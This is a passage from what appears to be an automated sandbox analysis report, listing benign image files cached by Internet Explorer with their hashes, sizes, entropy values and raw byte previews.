                                                                                                                                                                                                                  SSDEEP:192:Q2HVIja85wTt5jEzB7S5cljcIZB/Y23jEMaNzBinVjj59L/lR5G7qds+92:NHKja8uSlIMc0/Y2EKn9FRD5G7Us+92
                                                                                                                                                                                                                  MD5:ACA2AE200D9C82D4C26215F1A004CB6D
                                                                                                                                                                                                                  SHA1:0301B1E2CEA12E01B907D42BB612945313864E39
                                                                                                                                                                                                                  SHA-256:4C7839B338CB8A34E323BDD513226E6C521FED55BB81709714E0E79CB36394B9
                                                                                                                                                                                                                  SHA-512:1900C825746860015E6EE8E6E262586790211078D7613A053B4DCD876B4BC510DEFE9EA53DAE55C9F7B745FE71BE18ADFF182135B10BE20F707FF1D858168524
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.mlb..P.@.0..;...Z@%0..?... .....GO...G.......a./....d...........SIt.......7....qS...Q!S......]~..........4=.......^...?-........P..?..M....1....(..........Jc......E.............&(.b..PHP.@....;P.@.9........z.....Nw................w........@.../...G7.o..`....0@>.....g.-.....*........uB.....g..*:..]......_......o.....(.P.................B(......&(.1@...LP...LP.....(...@.j.C@.._...Bv.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AARm6Wm[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):10309
                                                                                                                                                                                                                  Entropy (8bit):7.946896625768144
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:Qn3ROtVV1XbHn8Pex6a6AFn7ImndigaQEKsKmSm98Rwndv+yPPc5l8smSV:03RUVfXTn8Pex6a6AqmndZvEKsJSmRnA
                                                                                                                                                                                                                  MD5:17BC523859EB009B1963A75AA1D27BDA
                                                                                                                                                                                                                  SHA1:B715DA62529FECCE34DC2A2622FFC22FE1E3E30C
                                                                                                                                                                                                                  SHA-256:940E999C8593520243A673BD7176F44C1850E1C7AE6412193A5E4337BDD065A1
                                                                                                                                                                                                                  SHA-512:CDAAF6BB7CC4B054D8DCEA801FE8D66EAF1513E07776CD2658C7F15F79B01A045AA852BDD16606F71DE2D625D1ACE86E2D8876DDE69DBA04F427E719D9F9A3AC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..t..}..]u..1...&.81....y.....qz.73E.#yc....6..k..r2..pz..I.o)#wJ....=...N...t.kF..<...V..x.d.8........>...ut...R...1.94A.[.In.~...d...]....2..:.bX...l...k...R95..S................=...............o......Dw.\$..c...O...W..+.U...K.('......v2.;G.!RrG.j...(.....Kw.1.d..0G|.'..".W..W.....`.u.............Wv&w..q4..r......q.T.....wV...F5..XY.<...9..W$.bU.V....A.!.br.f......ji..b
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AARmbBr[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7097
                                                                                                                                                                                                                  Entropy (8bit):7.854871847471743
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:QoAb6sTsA6sVwJ8gSq8zTTbAsJuQN6SJLirL5:bUpT6EwJLozXuW6V
                                                                                                                                                                                                                  MD5:CFAF2D02A2CE69A88B7A9C7568A8D9BA
                                                                                                                                                                                                                  SHA1:36597D8F034534C2E56CF3EEC5D90CD25B8F3821
                                                                                                                                                                                                                  SHA-256:349958F48882EDC780B1E9B98AEE16A68AA89DBE5772EF95795A05A93DF07A58
                                                                                                                                                                                                                  SHA-512:7C28915F6CF749D745AA295297D12DF6D163ACB368CBC63777C8C2995705A001A7AC43F340146DF3A6FD0EA3A39E03F992822C4C775E8AB928B044C1A0282805
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..+RB..`..Z.).P.H......(......).P.H......(.....`...@-...P.(.h........(......(......(........P.@.0.H......).R.h.....`- ......(............- ..J.)...e...P.@.@....P...@..........1J.a..q....+r..A`....,-0..J.(........e...P.@..-...P.@.@.....{g.@..?..~..h..K.~`..m..j..j....8#....M..f..v....;..Mj..BX..9.\,V.9..!...B...8.0..E+..a.j...(......#.............P.@..-.....K..Rq..)H.1$.-....Af...'M..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AARmdP1[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3332
                                                                                                                                                                                                                  Entropy (8bit):7.023865909080042
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Qf5uETAAwayYe7R0X/jsJEFxXpUZMhFHkOaotdTkXTC8D8Zl90:QfQESeX/QqFxXpiicAR4TPYZle
                                                                                                                                                                                                                  MD5:F3A4BDE457B3B12B70ECA3724C9A597D
                                                                                                                                                                                                                  SHA1:5F25A0E1B73298184CA6CD2052445AA3399385F5
                                                                                                                                                                                                                  SHA-256:8E8127EE05A1B8C629B0E515066C9D3E8835BC0AD7134628CE6D3BAA887754DE
                                                                                                                                                                                                                  SHA-512:44976E5314C6C8E654AFD9B0EAF45C54D6BD55EFE88F8E28D47B9373A34DF2819374C0EA7D8FF420B55B95D7A2B9BD311D5FC33E86D0EEFF4208A9F3B8A38311
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(......(......(......(......(......(......Q@.@....P.@....P.@....P.@....P.@....P.@....P.@..l..>..4..V.B...(......(......(......(......(......(.GZ..-..o%.2.h.D.ch-.R..(......(......(......(......(......(.......u.,.......r...OTr5.r....P.@....P.@....P.@....P.@....P.@....P...9..V..s..AI..eF.N..l.k.:?.EYQ.V.........t...&.. .....(......(......(......(......(...............O.c]^6:0..=..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AARme8P[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8757
                                                                                                                                                                                                                  Entropy (8bit):7.928252207713864
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:Qowi2Ds10/lV0TF3Ug+Uh76SCmIXp3wSvO+u37F8Tls:bwBDL/oTFkhUxINwoe7F8K
                                                                                                                                                                                                                  MD5:53E0465B08A1A1C55590DE1A377E695E
                                                                                                                                                                                                                  SHA1:309E1542443C8ADFBD79FF68D7442A40A3AA4112
                                                                                                                                                                                                                  SHA-256:48FA0FC3EB7666CDFE06043DA99800613B9F16B9739B73ECBE112F4E7E444A34
                                                                                                                                                                                                                  SHA-512:90FEBF7104903550529A7994E03AA01666B815444581F6F9AA1F256DC4E92E9E473B83C0F680FD6EBBE07661FC348B42A772B05B7A650560EA8854B24646D284
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..% 5;.|Cp.c$0...O.....+....AY.......j....|....sb...j.p..4....)...`....$....m. ..4a..C..6.Hl...h.+.d..x..j."......^HF.W.....8...:sV....VI!..L.t..7R.X|.w..sQ'dkF<.H.v..q.I.Q.....A...~qR..v...?@r..j..cy.6..>.rk4z.ee.c.d"..Z.......h.8...Td0......$.D...... 4.+d.|.2.85.CHx..V."..1.T.=.<..A.j.9..i..k[.Q..9=...-..?.j"..(...E...X.,e.....8.b.E{.....".5H.K.<U.H.L.w.kN....=H.....J..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AARmger[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11165
                                                                                                                                                                                                                  Entropy (8bit):7.952720665479278
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:QofUT98WTOALnIoSJfPsbN5qaTuot2CEE96IRDhD5iuWriqG/t1ZWOuDLxKnoH76:bfUT98iOwIoS5PsbN5qacHE9JDNWCVrt
                                                                                                                                                                                                                  MD5:5569435E24021161E5537D6E151302B1
                                                                                                                                                                                                                  SHA1:70C044A067C3CFCB9C529E65BD1FB7ACDAD5A8FB
                                                                                                                                                                                                                  SHA-256:CF4B1A74D642B6845A5EDF8D1EEED9E2FD6EBD019292610EDF293F3C656926EF
                                                                                                                                                                                                                  SHA-512:0781EF9C639EB0BB39047D8EC16F5CC91C6045A1A0960BAC331436EDC803293E5E1A4909E098DE517C6707F8688AE3C3E75E047540CEA0515E661606B1EB14B9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...L@h.(....@.Uwq.h..p.FI4\-r6.1V..pA.E.(..........Z.Z.....$(.A...".0...T.....Y{O{..ritu7.J./..(....&./..C...V..."[.Y.,t.q.]T...Mu2.s!..(.i7a.F.I..4.ni.R..bXP.P.@..A%..pB.I#mPH.?SJN.i\.m.Vk`!.Y.:s........9......x........q.~....uT...3..-. ...}.....}j.vBq..F..i...Z.(.....@.kDH...~...M5.... p.2?...ms#jO..G2Mq.u...5.t.....S..........q^.4.N);.......I-.y....!......Q..m..b.".K.@.@.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AARmlyN[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):23459
                                                                                                                                                                                                                  Entropy (8bit):7.963601517437201
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:NIGrv41zT8PzdtC/oeYA48G3iCdE7R7mbGnoIuna1WOsZ+J:NIGrUzT82geYAPGW7mMunavJ
                                                                                                                                                                                                                  MD5:D69BC5C426DEB55367A4AAD06488CA0B
                                                                                                                                                                                                                  SHA1:454F5ADE4F022C6A72EF23A033742E0309B428B5
                                                                                                                                                                                                                  SHA-256:F6E9EA59BB9052B59B8B86811C340FEC156820031F384E76C4DCF3FF1215AC47
                                                                                                                                                                                                                  SHA-512:D1FD5BBF5B9ED6D2F2D7ACA18CCA5B6BEDABD906022C5E4264E7874A37DD78D5CD4E9BB3C38CD24CDBA3A36A73B3F81CC72DD4285FCCE075814222FEA1E48E92
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..6;@*.>_......1#..%.6....sOAj..P.%..=..i.k]$..g......q.X.D.....1..T..W..H....9..E#.z.....H..F..p.G.Sk.{..q...@.1.C..v..|.\>p.....23.t..fN..2.....#g.Fr..f5.r[9..T.*r.'..5.........z......8.I. .#4.5.UO...+{..#...A...(2H.Q.....h$.o.4.K.E.v..i.....r...x.....9..y.7.......<.<.De..q..*.m.Lq....5.'.U..^..N..U.....'>.t.{..6.5c......`..q.A.=(4....6.O....p..s..8..s.....F......=.S.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AARmyym[1].jpg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7212
                                                                                                                                                                                                                  Entropy (8bit):7.882392318186589
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:QoTCB4Pg9/4IJDgYCyDA2j27fFZD64/QtyKQ:bgCgK8MYU379BfQtyKQ
                                                                                                                                                                                                                  MD5:804EF9D52496634B39D27D61B75ADADD
                                                                                                                                                                                                                  SHA1:CE5CD83EAF9BF2BD8964D1BFFF5B5F89D87748AD
                                                                                                                                                                                                                  SHA-256:12614527481A9B39F59FF6E4F56546BAC608E5DF63EA94F41ABE8400DA051709
                                                                                                                                                                                                                  SHA-512:E6D0FA52B704DB143668740DCB1E275D6083331B9A676EF13EB9E7B82F5FEC1C156F1853E32379112AEF742B41D6A8F1037C2EBF109275AEFBBF2558A4BBD9DC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..e`..Qs...].).g(....(.....J....:.nN*.1Z.-...QsyE4Z.....-J....5..7F...Vs.ff...5'D5E..d.RfSVeI...f....l.R3.lT...4.U'..V8.DYu"O-..y....V.q._p...BB..j.kl.*.Z..S..6.{v...H.9..@...G.tS..GJ.q6[...O.."...!Nh.&...(....J._....f.N*,t....QBD.W.$..Jm..Xdv.:RH.+.....3L.Z...s.4X^..R."..Q...h..k...S#zOB[e..Pm.`.....(.U$.O..dSz..........c.....Z.M..uQ.8.b.....t^I..0)\]...q..4..~Cgv....J..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1aXBV1[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1161
                                                                                                                                                                                                                  Entropy (8bit):7.80841974432226
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:zxxmempCXfPZq+DLeP1cRwZFIjvh3wuiFZMrFYzWkG4iD3w:zxRBXfB9k1cRuFIbJWsFYT/2w
                                                                                                                                                                                                                  MD5:D858BE67BEA11BF5CEC1B2A6C1C1F395
                                                                                                                                                                                                                  SHA1:6090B195BEF6AF1157654048EECEA81E2DCEC42A
                                                                                                                                                                                                                  SHA-256:FC7CF2E8592C8E63CFF72530DA560E3293EC2DE3732823DBAEB4464609EA0494
                                                                                                                                                                                                                  SHA-512:180FA05957A2FCF8192006D5F8E8D3E4DE1D79DD6F9F100D254C513068FC291B3086DE9A8897B3658D83FE3335FDEB4023F13AC3A6A8A507729AE22B621EC7D7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....pHYs..........+.....;IDATx...}..c.....j...2..Y.l....i.<4.c...)..p...M..(4b.Z.r...."cDe..Bz..sw.g.9.....^..u}?....n[he.{..,u.....`.>.[.iE...[.1B.Tx..X.7......0.[.....5.)p...x...d\...g..........WmE1.sl......u....3K.[......;...........f....W(.E3//6...2tG..AU...`7f.m. r;..r..{.~.X./.Q._..`.C...D.M.n.p%..U...0...HTe..1......7.@.Tn.r......C.k.../[..j.X..:.+Q.3.y.4. ,E....g.Y...p^..c..:..#/...iES....E.w..op.... .9.W........).+.1....A~.\...{...q.El..`.&;...o.&q:.K....|.....e.(..."9.z\.~.....G.h...\.'.;... G........J....P.gy..<BeK.I..<..d..MF".O.uE...R..-...{..J...F..*.a..lj...t\.W.....&.l|?...WvP...._o.c.....8..10;.q-"8L.2..~,....~V..|]..c..\.'...I.....u8.......Q.3..lB."..!LD.bs.K[..)0P0.9..'....K...W..g..,f.........S......S..)N..D;.....<.....7#..X2.ws.....H.vF'...,$l..R4.O/.~..j.'&..6.........!.D.m..].G........W#.Uir..sT..m....h...UN.._V#..S.6.....i..M....[..?.J.....OL\..Q<{.G.n5).Ix.....<+7Ey.....W.].NR.o...._.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1cG73h[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1131
                                                                                                                                                                                                                  Entropy (8bit):7.767634475904567
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
                                                                                                                                                                                                                  MD5:D1495662336B0F1575134D32AF5D670A
                                                                                                                                                                                                                  SHA1:EF841C80BB68056D4EF872C3815B33F147CA31A8
                                                                                                                                                                                                                  SHA-256:8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
                                                                                                                                                                                                                  SHA-512:964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.....*..<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue...*.....?A...v..0...aS.*:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C|{.|r.$.=Y.#5.K6.!........d.G...{......$.-D*.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....|K..T....vd....cH.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB7hg4[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):470
                                                                                                                                                                                                                  Entropy (8bit):7.360134959630715
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7TIG/Kupc9GcBphmZgPEHfMwY7yWQtygnntrNKKBBN:3KKEc9GcXhmZwM9LtyGJKKBBN
                                                                                                                                                                                                                  MD5:B6EA6C62BAEBF35525A53599C0D6F151
                                                                                                                                                                                                                  SHA1:4FFEFB243AAEC286D37B855FBE33C790795B1896
                                                                                                                                                                                                                  SHA-256:71CC7A3782241824ACDC2D6759E455399957E3C7C9433A1712C3947E2890A4D4
                                                                                                                                                                                                                  SHA-512:0E4E87A66CF6E01750BC34D2D1EC5B63494A7F5C4B831935DD00E1D825CDB1CFD3C3E90F29D1D4076E7F24C9C287E59BE23627D748DB05FB433A3A535F115464
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx..QKN.A....(..1a.....p...o..T........./.......$..n\...V.C .b2.......qe'.T.1.1h8./.....$:Y6...w}_>...P.o$.n....X,<...R..y....$p.P..c.\.7..f...H.vm...I........b..K..3.....R..u...Z'.?..$.B...l.r....H.1....MN).c.K1H..........t...9........d.$.....:..8..8@t._...1.".@C....i&Z.'...A1...!....R....}.w.E4.|_..N.....b...(.^.vH........j......s...h. ..9.p!.....gT.=B.|..,=v.......G..c.5.....IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBK9Hzy[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):480
                                                                                                                                                                                                                  Entropy (8bit):7.323791813342231
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7BusWIjbykLNgdQLPhgZPwb6txC3nUPuZZcb:MW6bykxgSh6a6TCStb
                                                                                                                                                                                                                  MD5:163E7CEBA4224A9D25813CD756D138CC
                                                                                                                                                                                                                  SHA1:062FFF66A1E7C37BAE1ECE635034A03C54638D50
                                                                                                                                                                                                                  SHA-256:14525F17E552171DEE6D57C932287048185BE36D9AC25DA79CB02AD00657DEAF
                                                                                                                                                                                                                  SHA-512:C37D77C1414B75CE6E3A90087B3C1E9D57AF6BCA4C140F1F4F43503D89C849EE1143315260A4DF92F1DD273305C15121FF199C04E946FA3BBD98B9B1D6636069
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .PNG........IHDR................a....pHYs..........+......IDATx..R=H.Q.}...?....!... ..0h.B......!!.......h.j.........%i.J..%.5.:.._c.u.x.=....wQ...?.L.\E..] ...O.&.m..l.U.z..M6.....9.....(....3...x.O!3.....o&}.........]*.w....x..s.%..4.E.WX..{..!....4...2hB...c.m...]m0W."Y.,.2n.W..P.U.a .p...f.\gV....:0.4e........^s 4.j..0...u..*..t6....v..4...c8.4...0./i.Dh..../[t..h.5...!E$.....+..r..C.v......T<.....S..*z#.:...p.B.....").}R........=.....w.e......IEND.B`.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBPfCZL[1].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2313
                                                                                                                                                                                                                  Entropy (8bit):7.594679301225926
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
                                                                                                                                                                                                                  MD5:59DAB7927838DE6A39856EED1495701B
                                                                                                                                                                                                                  SHA1:A80734C857BFF8FF159C1879A041C6EA2329A1FA
                                                                                                                                                                                                                  SHA-256:544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
                                                                                                                                                                                                                  SHA-512:7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..*z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....*TP......>...L..!T.X!.(..@a..IsgM..|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBVuddh[2].png
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):316
                                                                                                                                                                                                                  Entropy (8bit):6.917866057386609
                                                                                                                                                                                                                  Encrypted:false
